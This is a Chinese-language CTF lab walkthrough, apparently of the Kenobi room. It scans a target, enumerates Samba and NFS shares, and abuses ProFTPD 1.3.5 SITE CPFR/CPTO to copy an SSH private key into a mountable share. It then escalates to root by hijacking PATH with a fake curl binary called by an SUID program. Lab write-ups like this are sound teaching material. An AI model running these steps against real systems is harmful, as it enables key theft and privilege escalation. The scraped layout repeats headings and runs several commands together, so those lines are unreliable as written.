
Kenobi-练习
本文相关内容:针对Linux目标机器,通过枚举Samba来获得网络共享信息,然后利用proftpd的版本漏洞,并通过Path变量来执行权限提升操作。
端口扫描
nmap -sC -sV -A -T4 10.10.54.34

枚举Samba共享











通过ProFtpd 获得初始访问权限








通过PATH变量提权







最后更新于

本文相关内容:针对Linux目标机器,通过枚举Samba来获得网络共享信息,然后利用proftpd的版本漏洞,并通过Path变量来执行权限提升操作。
nmap -sC -sV -A -T4 10.10.54.34



























最后更新于
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.54.34
#也可以使用以下命令:smbclient -L \\\\10.10.54.34\\smbclient //10.10.54.34/anonymous #此ip为目标机的ip 不需要输入密码 按回车键即可smbget -R smb://10.10.54.34/anonymous #此ip为目标机的ip 不需要输入密码 按回车键即可nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.54.34 #此ip为目标机ipnc 10.10.54.34 21 #此处ip为目标机ip 目标机的ftp服务运行在21端口上searchsploit proftpd 1.3.5#连接目标机的FTP服务器,FTP运行在21端口
nc 10.10.54.34 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa #将密钥复制到NFS所挂载的/var目录下mkdir /mnt/kenobiNFS
mount 10.10.54.34:/var /mnt/kenobiNFS #此处的ip是目标机ip。完成挂载后:目标机的/var目录下的所有文件,都将在攻击机的/mnt/kenobiNFS目录下
ls -la /mnt/kenobiNFScp /mnt/kenobiNFS/tmp/id_rsa .
chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.54.34 -oHostKeyAlgorithms=+ssh-rsa权限 在文件上 在目录上
SUID Bit 用户使用文件所有者的权限执行文件 -
SGID Bit 用户在组所有者的权限下执行该文件 在目录中创建的文件获取相同的组所有者。
Sticky Bit 无意义 阻止用户删除其他用户目录下的文件find / -perm -u=s -type f 2>/dev/nullstrings /usr/bin/menu cd /tmp
echo /bin/bash > curl
chmod +x curl
export PATH=/tmp:$PATH #新添加的路径/tmp会在PATH变量的最前面,这样就能用我们伪造的curl文件代替真实的curl文件,保证自定义的curl文件被成功执行
/usr/bin/menu #在跳出选项时,我们选择选项一,这样就能调用到伪造的curl文件
ls /root/
cat /root/root.txt